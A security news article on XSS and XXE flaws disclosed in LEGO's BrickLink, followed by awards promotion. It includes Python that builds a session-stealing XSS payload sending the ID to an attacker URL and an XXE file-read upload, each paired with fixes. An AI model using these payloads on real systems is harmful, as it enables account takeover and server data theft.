API Security Flaws Found within The LEGO® Group Online Service Platform

Two API security vulnerabilities were discovered within BrickLink, a digital resale platform owned by The LEGO® Group. With more than one million members, Bricklink serves as the world's largest online marketplace to buy and sell second-hand LEGO. The API security flaws could have allowed for large-scale account takeover (ATO) attacks on customers’ accounts. (Courtesy of The Lego Group)

Salt Labs has released new threat research highlighting two API security vulnerabilities discovered within BrickLink, a digital resale platform owned by The LEGO® Group, which could have enabled attackers to compromise LEGO’s internal servers and exfiltrate global users’ private account data.

With more than one million members, Bricklink is the world’s largest online marketplace to buy and sell second-hand LEGO.


The API security flaws found and reported by API security provider Salt Security could have allowed for both large-scale account takeover (ATO) attacks on customers’ accounts and server compromise, enabling bad actors to:

  • Manipulate platform users to gain complete control over their accounts.

  • Leak personal identifiable information (PII) and other sensitive user data stored internally by the platform.

  • Gain access to internal production data, which could have led to a full compromise of the company’s internal servers.

Salt Labs, the research arm of Salt Security and a public forum for API security education, discovered both vulnerabilities by examining areas of the site that accept user input.

In the “Find Username” dialog box of the coupon search functionality, researchers found a cross-site scripting (XSS) vulnerability: a crafted link injects script that the victim’s browser then executes in the context of the BrickLink site. On its own, that gives an attacker only what the browser exposes to page script, so the team chained the XSS with a session ID that a different page exposed in its content.

By combining those two vulnerabilities, script planted through the XSS could load the page that exposed the session ID, read the identifier out of the response and send it to the attacker, who could then present it to the site and hijack the session, achieving a full account takeover (ATO). Exposing a session identifier in page content undoes the protection of an HttpOnly cookie: script cannot read the cookie, but it can read the page. Bad actors could have used these tactics for full ATO or to steal sensitive user data.
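To make the chain concrete, here is an added example in Python (not BrickLink’s code and not from Salt Labs’ report): a reflected sink like the one described, the same sink with output encoding applied, and a constructed payload that, once it runs in the victim’s browser, fetches a page that prints the session ID and sends the ID to the attacker. The page path `/account/settings`, the `sessionId=` format the regex looks for, and the example hosts are assumptions for illustration only.

```python
"""Added example (not BrickLink's code): the reflected-XSS sink the article describes, its
encoded form, and a constructed payload that chains the XSS with a session ID leaked in page
content. The page path and the leaked-ID format below are assumptions, not BrickLink's."""
import html
import re
from urllib.parse import quote, unquote, urlparse

# Hypothetical page that prints the current session ID somewhere in its HTML.
SESSION_LEAK_PATH = "/account/settings"


def render_find_username_vulnerable(query: str) -> str:
    """Reflects the search term into the HTML untouched: '<' in the query becomes markup."""
    return f"<div id='results'>No users matching: {query}</div>"


def render_find_username_fixed(query: str) -> str:
    """Same page with the reflected value HTML-encoded; '<', '>', '&' and quotes become entities."""
    return f"<div id='results'>No users matching: {html.escape(query, quote=True)}</div>"


def chained_payload(attacker_url: str) -> str:
    """Constructed XSS payload. Because it runs in the site's origin it can fetch the page that
    leaks the session ID (something an HttpOnly cookie alone does not prevent), pull the ID
    out with a regex (format assumed: sessionId=<value>) and send it to the attacker."""
    return (
        "<script>"
        f"fetch('{SESSION_LEAK_PATH}',{{credentials:'include'}}).then(r=>r.text()).then(t=>{{"
        "const m=t.match(/sessionId=([A-Za-z0-9]+)/);"
        f"if(m)fetch('{attacker_url}?sid='+m[1]);"
        "})"
        "</script>"
    )


def crafted_link(find_username_url: str, payload: str) -> str:
    """The link a victim would be sent: the payload URL-encoded into the search parameter."""
    return f"{find_username_url}?username={quote(payload, safe='')}"


def query_from_link(link: str) -> str:
    """What the server sees after decoding the 'username' parameter of that link."""
    query_string = urlparse(link).query
    return unquote(query_string.split("username=", 1)[1])


def contains_script(rendered_html: str) -> bool:
    """Demo check: did a <script> element survive into the rendered page?"""
    return re.search(r"<script\b", rendered_html, re.IGNORECASE) is not None
```

The encoded renderer is the minimum fix for the sink. Independently of it, a session identifier should never be written into page content, and a Content-Security-Policy that disallows inline script would stop this particular payload even where encoding was missed.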

The second vulnerability was found within the platform’s “Upload to Wanted List” page. This endpoint allows users to upload lists of wanted LEGO parts and sets in XML format. Using this feature, Salt Labs researchers could execute an XML External Entity (XXE) injection attack: the uploaded XML carried a DOCTYPE declaring an entity that referenced an external resource, and the server-side XML parser, configured to resolve such entities, fetched the resource and substituted its contents into the document.

By leveraging the XXE injection, researchers could read files on the web server and perform server-side request forgery (SSRF), making the server issue requests to destinations of the attacker’s choosing. An SSRF from an AWS-hosted server can be abused in many ways; one example is querying the EC2 instance metadata service to obtain the instance’s temporary AWS credentials, the “EC2 tokens” in Salt’s account. Enforcing IMDSv2, which releases credentials only to clients that first obtain a session token with a PUT request, blunts this particular pivot, since entity resolution can only issue GETs; disabling external entity resolution in the parser removes the root cause.
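The upload-parsing step and its file-read/SSRF consequence described above, as an added example in Python using only the standard library (this is not BrickLink’s code or Salt Labs’ exploit): a constructed wanted-list upload whose ITEMID is an external entity pointing at a file on the server, parsed first with external entity resolution switched on, then with it off, then through a hardened entry point that refuses any DOCTYPE. The wanted-list schema, the file contents and the paths are assumptions; a Linux-style absolute path is assumed for the `file://` URL.

```python
"""Added example (not BrickLink's code): a wanted-list XML upload parsed by an XML parser
that resolves external entities, next to a hardened parser. Linux paths assumed."""
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample in the shape of a BrickLink wanted list (the exact schema is assumed).
BENIGN_WANTED_LIST = b"""<?xml version="1.0"?>
<INVENTORY>
  <ITEM><ITEMTYPE>P</ITEMTYPE><ITEMID>3001</ITEMID><COLOR>11</COLOR><MINQTY>4</MINQTY></ITEM>
</INVENTORY>
"""


def wanted_list_with_xxe(secret_path: str) -> bytes:
    """Constructed malicious upload: ITEMID is an external entity that points at a server-side
    file. A parser that resolves external entities reads the file and places its text inside
    ITEMID; an application that echoes the parsed list back then hands the file to the uploader.
    A http:// URL in the same place turns the parser into an SSRF client."""
    return f"""<?xml version="1.0"?>
<!DOCTYPE INVENTORY [
  <!ENTITY xxe SYSTEM "file://{secret_path}">
]>
<INVENTORY>
  <ITEM><ITEMTYPE>P</ITEMTYPE><ITEMID>&xxe;</ITEMID><COLOR>11</COLOR><MINQTY>1</MINQTY></ITEM>
</INVENTORY>
""".encode()


class ItemIdCollector(ContentHandler):
    """Collects the text of every ITEMID element, the field the demo payload targets."""

    def __init__(self):
        super().__init__()
        self.item_ids = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "ITEMID":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "ITEMID":
            self.item_ids.append("".join(self._buf).strip())
            self._buf = None


def parse_wanted_list(xml_bytes: bytes, resolve_external_entities: bool) -> list:
    """Parse an upload with the stdlib SAX/expat parser.
    resolve_external_entities=True is the weak configuration: SYSTEM entities are fetched
    (file:// and http:// alike), which is the XXE file read and the SSRF primitive in one.
    False (the stdlib default since Python 3.7.1) drops the reference, leaving ITEMID empty."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ItemIdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.item_ids


def parse_wanted_list_hardened(xml_bytes: bytes) -> list:
    """Hardened entry point: a wanted list never needs a DTD, so refuse any DOCTYPE outright
    (which also blocks internal-entity expansion attacks) and keep entity resolution off."""
    if re.search(rb"<!DOCTYPE", xml_bytes, re.IGNORECASE):
        raise ValueError("DOCTYPE declarations are not accepted in wanted-list uploads")
    return parse_wanted_list(xml_bytes, resolve_external_entities=False)


def run_demo() -> dict:
    """Plant a constructed 'server-side secret' in a temp file and parse the malicious upload
    three ways. Returns the results so they can be checked rather than only printed."""
    secret = "demo-secret-that-must-stay-on-the-server"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret + "\n")
        secret_path = fh.name
    try:
        payload = wanted_list_with_xxe(secret_path)
        results = {
            "secret": secret,
            "weak": parse_wanted_list(payload, resolve_external_entities=True),
            "entities_off": parse_wanted_list(payload, resolve_external_entities=False),
            "benign": parse_wanted_list_hardened(BENIGN_WANTED_LIST),
        }
        try:
            parse_wanted_list_hardened(payload)
            results["hardened_rejected"] = False
        except ValueError:
            results["hardened_rejected"] = True
    finally:
        os.unlink(secret_path)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The weak and the safe configuration differ by a single parser feature, which is the practical lesson: check what the parser in use does by default rather than assuming. The equivalent switches elsewhere are `resolve_entities=False` on an lxml `XMLParser` and the `disallow-doctype-decl` feature on Java’s JAXP parsers.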

Upon discovering the vulnerabilities, Salt Labs’ researchers followed coordinated disclosure practices with LEGO, and all issues were remediated swiftly.

Yaniv Balmas, Salt Security VP of Research

“Today, nearly all business sectors have increased their usage of APIs to enable new functionality and streamline the connection between consumers and vital data and services,” explained Yaniv Balmas, VP of Research, Salt Security.

“As a result, APIs have become one of the largest and most significant attack vectors to gain access to company systems and user data.”

“As organizations rapidly scale, many remain unaware of the sheer volume of API security risks and vulnerabilities that exist within their platforms, leaving companies and their valuable data exposed to bad actors.”

According to the recent Salt Security State of API Security Report, Q3 2022, clients of Salt experienced a 117% increase in API attack traffic while their overall API traffic grew 168%.

The Salt Security API Protection Platform enables companies to identify risks and vulnerabilities in APIs before they are exploited by attackers, including those listed in the OWASP API Top 10.


The platform protects APIs across their full lifecycle: build, deploy, and runtime phases, utilizing cloud-scale big data combined with AI and ML to baseline millions of users and APIs.

By delivering context-based insights across the entire API lifecycle, Salt enables users to detect the reconnaissance activity of bad actors and block them before they can reach their objective. The exploits the Salt Labs team performed would have immediately triggered the Salt platform to highlight the attack.

To learn more, go to salt.security.

Related technologies…

Sophos MDR Takes 2022 Platinum ‘ASTORS’ for Best Cyber Managed Threat Response

Attendees enjoying the 2022 ‘ASTORS’ Awards Ceremony Include: (left to right), Dr. Kathleen Kiernan, President of NEC National Security Solutions (NSS); John Boyd Assistant Director of the DHS Office of Biometric Identity Management (OBIM); Jim Robell, President of Fortior Solutions and the 2022 ‘ASTORS’ Industry Leadership & Innovation Person of the Year; Legendary Police Commissioner Bill Bratton; Kym Craven, Executive Director for the National Association of Women Law Enforcement Executives (NAWLEE); CBP OFO DEAC Diane Sabatino, the 2022 ‘ASTORS’ Government Leadership & Innovation Person of the Year; OBIM Chief of Staff Penelope Smith; Frank Russo, CBP OFO Director of Field Operations NY & NJ; and Celinez Nunez, Assistant Director & Chief Security Officer for the Bureau of Alcohol, Tobacco, Firearms & Explosives (ATF).

American Security Today’s Annual ‘ASTORS’ Awards is the preeminent U.S. Homeland Security Awards Program, and now in its Seventh Year, continues to recognize industry leaders of Physical and Border Security, Cybersecurity, Emergency Preparedness – Management and Response, Law Enforcement, First Responders, as well as federal, state and municipal government agencies in the acknowledgment of their outstanding efforts to Keep our Nation Secure.

Sophos (First of Four)

Best Anti-Malware Solution

Sophos Intercept X Advanced with XDR

  • As organizations worldwide adopted remote work and increasingly managed globally distributed networks and cloud-based applications, the incidence of cyberattacks increased significantly. The statistics are alarming.

  • According to Sophos’s 2022 State of Ransomware Report, Ransom attacks are more frequent (66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020); Ransom payments are higher (In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020); and the average cost to recover from the most recent ransomware attack in 2021 was $1.4 million.

  • To defend against such threats, organizations require an anti-malware solution that provides next-generation anti-exploit and anti-ransomware technology and root cause analysis. Sophos Intercept X Advanced with XDR (Extended Detection and Response), the first and only endpoint security solution built for IT managers and cybersecurity experts, addresses each of these criteria.


  • Intercept X Advanced with XDR revolutionizes endpoint security, turning traditional reactive defense on its head with a proactive approach. It assesses the threat landscape, processes limitless samples, and makes more accurate predictions faster than traditional machine learning solutions for a more intelligent response to cybersecurity risks.

  • Furthermore, Intercept X Advanced with XDR is the industry’s only extended detection and response solution that synchronizes native endpoint, server, firewall, and email security, including Sophos MDR, a fully managed threat hunting, detection, and response service, that fuses machine learning technology and expert analysis for improved threat hunting and detection, deeper investigation of alerts, and targeted actions to eliminate threats with speed and precision.

Sophos (Second of Four)

Best Cyber Managed Threat Response

  • Sophos MDR

  • Sophos Managed Detection and Response (formerly Managed Threat Response) is a fully-managed threat hunting, detection, and response service that provides a dedicated 24/7 security team to rapidly identify and neutralize sophisticated and complex threats targeting your computers, servers, networks, cloud workloads, email accounts, and more.

Sophos MDR identifies and neutralizes in-progress attacks – including ransomware, network breaches, hands-on keyboard adversaries, and more – to minimize damage and costs and reduce recovery time.
  • Sophos MDR protects more than one million devices and has seen more than 500% growth since August 2020. It now protects over 8,500 customers and is one of the industry’s most widely used managed detection and response services.

  • Sophos MDR fuses machine learning with human analysis for an evolved, innovative approach to proactive security protection, combining Sophos’ top-rated endpoint protection and data-driven Extended Detection & Response (XDR) with a world-class team of experts to neutralize the most complex threats.

  • By leveraging proprietary investigation techniques to differentiate attacker tactics, techniques, and procedures (TTPs) that can appear normal and go undetected, Sophos MDR can better anticipate attacker behavior and identify new indicators of attack and compromise. Sophos MDR is customizable with service tiers and response modes to meet organizations’ evolving needs, providing them control over how and when incidents are escalated and what response actions are taken.

  • Sophos MDR stands apart from top competitors with its ability to proactively take action to mitigate threats. Unlike competing services that stop at notifications, Sophos MDR neutralizes active threats: highly trained teams of world-class experts remotely disrupt, contain, and neutralize threats with speed and precision.


  • Other services have complex hourly pricing structures, whereas Sophos MDR provides cost predictability with fixed-fee services, and enables responders to cut through red tape that could delay precious time to neutralize an active attacker that could potentially destroy businesses.

Sophos (Third of Four)

Best Endpoint Threat Solution

  • Sophos Intercept X Advanced with XDR

  • Sophos Intercept X combines anti-exploit, anti-ransomware, deep learning AI, and control technology; it stops attacks before they impact your systems, using a comprehensive, defense-in-depth approach to endpoint protection rather than relying on one primary security technique.

Intercept X Advanced with XDR, a leader in the 2021 Gartner Magic Quadrant for Endpoint Protection Platforms (EPP), offers the industry’s best malware detection engine and state-of-the-art anti-ransomware technology.
  • Cyberattacks threaten not only the security but also the financial health of organizations. According to Sophos’s State of Ransomware 2022 report, the average cost to recover from a ransomware attack in 2021 was $1.4 million. Intercept X not only reduces these costs significantly; it also provides substantial help in preventing the cyberattacks in the first place.

  • Customers report an 85% decrease in cyberattacks since they began using Intercept X Advanced with XDR and say that the reduction in time spent on remediation has made them twice as efficient at day-to-day tasks.

  • Such efficiencies have propelled Intercept X Advanced with XDR’s market share to an all-time high. Sophos expects the momentum to continue as cybercriminals keep finding new methods of threatening organizations across multiple endpoints.

Sophos (Fourth of Four)

Best Network Security Solution

  • Sophos Firewall

  • The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. To defend against such threats, organizations require a network security solution that delivers advanced protection against cyberattacks without sacrificing performance or flexibility. Sophos Firewall does exactly that.

Sophos Firewall’s Xstream architecture protects your network from the latest threats while accelerating your important SaaS, SD-WAN, and cloud application traffic.
  • In April 2021, Sophos upgraded the product’s hardware with XGS Series appliances that provide the industry’s best zero-day threat protection, with native support for TLS 1.3, which is up to five times faster than other models available on the market today. The TLS capabilities are critical tools in battling cybercrime: nearly half of the malware Sophos detected in January through March 2021 used TLS to conceal malicious communications.

  • Sophos Firewall’s recent advancements for software-defined wide area networks (SD-WANs) and virtual private networks (VPNs) enable organizations to address the complexities and risks of the modern encrypted internet without compromising speed or efficiency, and the ability to integrate Sophos Firewall with other Sophos offerings under one unified management umbrella enhances the scalability, efficacy, and efficiency of the product.


  • One of the key integrations is with Sophos ZTNA, a zero-trust network access offering, which micro-segments networks to protect against intrusions, lateral movement, and data theft.

  • Furthermore, users of Sophos Firewall gain access to the Sophos Adaptive Cybersecurity Ecosystem, an open architecture that constantly learns and improves through automation and analytics as well as the collective input of Sophos products, partners, customers, and developers.

  • *Sophos is a new competitor to the 2022 ‘ASTORS’ Homeland Security Awards Program.

Homeland Security remains at the forefront of our national conversation as we experience an immigration crisis along our southern border and crime rates that are dramatically higher than before the Pandemic across the United States.

CBP K9 Team Zaskya Steros and TYKE, with Commissioner Bill Bratton at the 2022 ‘ASTORS’ Awards Luncheon.

These challenges have become a national priority with an influx of investments in innovative new technologies and systems.

Enter American Security Today, the #1 publication and media platform in the Government Security and Homeland Security fields, with a circulation of over 75,000 readers and many tens of thousands more who visit our AST website at www.americansecuritytoday.com each month.

The pinnacle of the Annual ‘ASTORS’ Awards Program is the Annual ‘ASTORS’ Awards Ceremony Luncheon Banquet, an exclusive, full-course plated meal event in the heart of New York City.

2022 ‘ASTORS’ Awards Luncheon

This year’s exclusive sold-out ‘ASTORS’ luncheon featured representatives of law enforcement, public safety, and industry leaders who came together to honor the selfless service of those who stand on the front lines, and those who stand beside them – providing the capabilities and technologies to create a safer world for generations to come.

This year marks the 20th anniversary of the Department of Homeland Security (DHS), which came out in force, to discuss comprehensive collaborations between private and public sectors that have led to the development of intelligence and technologies which serve to protect our nation.

Deputy Executive Assistant Commissioner (DEAC) Diane Sabatino, expresses her pride in the women and men of the CBP, and their families who support them.

The continually evolving ‘ASTORS’ Awards Program emphasized the trail of Accomplished Women in Leadership in 2022, as well as the Significance and Positive Impact of Advancing Diversity and Inclusion in our Next Generation of Government and Industry Leaders.

The keynote address was provided by U.S. Customs and Border Protection (CBP) Office of Field Operations (OFO) Deputy Executive Assistant Commissioner (DEAC) Diane Sabatino, who described the changes to CBP through the tragedy of 9/11 and the relentless commitment to its mission and ongoing investment in the latest technologies and innovations to protect our borders and Homeland.

The resounding theme of the DEAC’s remarks was her pride in the women and men of the CBP and their families who support them.

Deputy Inspector Lashonda Dyce accepts a 2022 ‘ASTORS’ Award on behalf of the NYPD TARU Unit for Excellence in Public Safety, joined at left by Commissioner Bill Bratton, and at right Chief of Department Kenneth Corey.

AST was also joined by Legendary Police Commissioner William Bratton, who spoke, as always, about his love for the City of New York, the Profession of law enforcement to which he has dedicated his life, and for which he continues to drive thought leadership and innovation.

New York City Police Department (NYPD) Chief of Department Kenneth Corey, came out to address Luncheon attendees and shared some of his experiences and the changes in policing he’s witnessed over his more than three decades of service.

Katherine Schweit, attorney, security consultant, retired FBI special agent, and former head of the FBI’s active shooter program.

FDNY Chief Joseph Jardin honored the men and women of the FDNY, not only those who currently serve but all of those who have selflessly served, with a special recognition of those lost on 9/11.

Chief Jardin spoke about the continuing health battle of many following 9/11 with cancer and respiratory disease, yet now knowing the full consequences, would not have made a different decision to respond.

As Chief Jardin noted, mission-driven service is in the lifeblood of every firefighter, volunteer and sworn and has been so throughout the history of the Fire Service.

Former head of the FBI’s active shooter program, Katherine Schweit joined AST to sign complimentary copies of her book, ‘STOP THE KILLING: How to End the Mass Shooting Crisis,’ thanks to the generosity of our 2022 ‘ASTORS’ Awards Sponsors.

The 2022 ‘ASTORS’ Awards Program was Proudly Sponsored by NEC National Security Systems (NSS), ATI Systems, Automatic Systems of America, guardDog AI, Fortior Solutions, IPVideo Corporation, Rajant Corporation, RX Global, and SIMS Software!

We were pleased to welcome the esteemed New York City Fire Department (FDNY); the New York City Police Department (NYPD); and the NYC Hospital Police, as well as Executive Management from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and many other DHS agencies, Federal law enforcement agencies, and private/public partnerships such as the National Association of Women Law Enforcement Executives (NAWLEE), the 30×30 Initiative, a coalition of professionals advancing the representation of women in policing; and Operation Lifesaver, Inc. (OLI) (rail safety advocates).

The FDNY was honored in the 2022 ‘ASTORS’ Awards Program for Excellence in Public Safety and Critical Incident Response, accepted by FDNY Chief Joseph Jardin and Deputy Assistant Chief Frank Leeb.

The prestigious Annual ‘ASTORS’ Homeland Security Awards Program highlights the most cutting-edge and forward-thinking security solutions coming onto the market today, to ensure our readers have the information they need to stay ahead of the competition and keep our Nation safe – one facility, street, and city at a time.

Katherine Schweit, former head of the FBI’s active shooter program speaks with ‘ASTORS’ Attendees and autographs copies of ‘STOP THE KILLING: How to End the Mass Shooting Crisis.’

In 2022 over 240 distinguished guests representing Federal, State, and Local Governments, and Industry Leading Corporate Firms gathered from across North America, Europe, and the Middle East to be honored among their peers in their respective fields.

Each year, to keep our communities safe and secure, security dealers, installers, integrators, and consultants, along with corporate, government, and law enforcement/first responder practitioners, convene in New York City to network, learn and evaluate the latest technologies and solutions from premier exhibiting brands at ISC East, the Natural Disaster & Emergency Management Expo (NDEM EXPO), and the ASIS NYC Expo.

ISC East is the Northeast’s leading security & public safety event, hosted in collaboration with sponsor Security Industry Association (SIA) and in partnership with ASIS NYC.

U.S. Customs and Border Protection (CBP) was Honored at the 2022 ‘ASTORS’ Homeland Security Awards Ceremony and Banquet Luncheon in New York City, featuring OFO DEAC Diane Sabatino and Director of Field Operations NY Area Frank Russo (at center).

Corporate firms, the majority of which return year to year to build upon their Legacy of Wins, include:

Advanced Detection Technologies, AMAROK, ATI Systems, Axis Communications, Automatic Systems, BriefCam, Canon U.S.A., Cellbusters, CornellCookson, CyberArk, Fortior Solutions, guardDog.ai, Hanwha Techwin of America, High Rise Escape Systems, IPVideo Corporation, Konica Minolta Business Solutions, NEC National Security Systems, NICE Public Safety, OnSolve, PureTech Systems, Quantum Corporation, Rave Mobile Safety, Regroup Mass Notification, Robotic Assistance Devices, Rajant Corporation, SafeLogic, Select Engineering Services LLC, Singlewire Software, SolarWinds Worldwide, Teledyne FLIR, Valor Systems, and West Virginia American Access Control Systems, just to name a few!

Why American Security Today?

The traditional security marketplace has long been covered by a host of publications putting forward the old-school basics to what is Today – a fast-changing security landscape.

American Security Today is uniquely focused on the broader Homeland Security & Public Safety marketplace with over 75,000 readers at the Federal, State, and local levels of government as well as firms allied to the government.

American Security Today brings forward a fresh compelling look and read with our customized digital publications that hold readers’ eyes throughout the story with cutting-edge editorial that provides solutions to their challenges.

Harness the Power of the Web – with our 100% Mobile Friendly Publications

AST puts forward the Largest and Most Qualified Circulation in Government with Over 75,000 readers on the Federal, State and Local levels.

AST Digital Publications are distributed to over 75,000 qualified government and homeland security professionals, in federal, state, local, and private security sectors.

‘PROTECTING OUR NATION, ONE CITY AT A TIME’

AST Reaches both Private & Public Experts, essential to meeting these new challenges.

Today’s new generation of public safety and security experts need real-time knowledge to deal with domestic and international terrorism, lone wolf attacks, unprecedented urban violence, shifts in society, culture, and media bias – making it increasingly difficult for Homeland Security, Law Enforcement, First Responders, Military and Private Security Professionals to implement coordinated security measures to ensure national security and improve public safety.

American Security Today

These experts are from Government at the federal, state, and local levels as well as from private firms allied to the government.

AST provides a full plate of topics in our AST Monthly Magazine Editions, AST Website, and AST Daily News Alerts, covering 23 Vital Sectors such as Access Control, Perimeter Protection, Video Surveillance/Analytics, Airport Security, Border Security, CBRNE Detection, Ports, Cybersecurity, Networking Security, Encryption, Law Enforcement, First Responders, Campus Security, Security Services, Corporate Facilities, and Emergency Response among others.

AST has Expanded readership into integral Critical Infrastructure audiences such as Protection of Nuclear Facilities, Water Plants & Dams, Bridges & Tunnels, and other potential targets of terrorism.

Other areas of concern include Transportation Hubs, Public Assemblies, Government Facilities, Sporting & Concert Stadiums, our Nation’s Schools & Universities, and Commercial Business Destinations – all enticing targets due to the large number of persons and resources clustered together.

To learn more about ‘ASTORS’ Homeland Security Award Winners solutions, Be On the LookOut for the 2022 ‘ASTORS’ CHAMPIONS Edition Fully Interactive Magazine – the Best Products of 2022 ‘A Year in Review’.

The Annual CHAMPIONS edition includes a review of ‘ASTORS’ Award Winning products and programs, highlighting key details on many of the winning firm’s products and services, including video interviews and more.

For example, please see the AST 2020 CHAMPIONS Edition.

It will serve as your Go-To Source throughout the year for ‘The Best of 2022 Products and Services’ endorsed by American Security Today, and can satisfy your agency’s and/or organization’s most pressing Homeland Security and Public Safety needs.

From Physical Security (Access Control, Critical Infrastructure, Perimeter Protection, and Video Surveillance Cameras and Video Management Systems), to IT Security (Cybersecurity, Encryption, Data Storage, Anti-Malware, and Networking Security – to name a few), the 2022 ‘ASTORS’ CHAMPIONS EDITION will have what you need to Detect, Delay, Respond to, and Mitigate today’s real-time threats in our constantly evolving security landscape.

It will also include featured guest editorial pieces from some of the security industry’s most respected leaders, and recognized firms in the 2022 ‘ASTORS’ Awards Program.

A complete list of 2022 ‘ASTORS’ Award Winners will be announced shortly.

For more information on All Things American Security Today, as well as the 2023 ‘ASTORS’ Awards Program, please contact Michael Madsen, AST Publisher at mmadsen@americansecuritytoday.com.

AST strives to meet a 3 STAR trustworthiness rating, based on the following criteria:

  • Provides named sources
  • Reported by more than one notable outlet
  • Includes supporting video, direct statements, or photos

Subscribe to the AST Daily News Alert Here.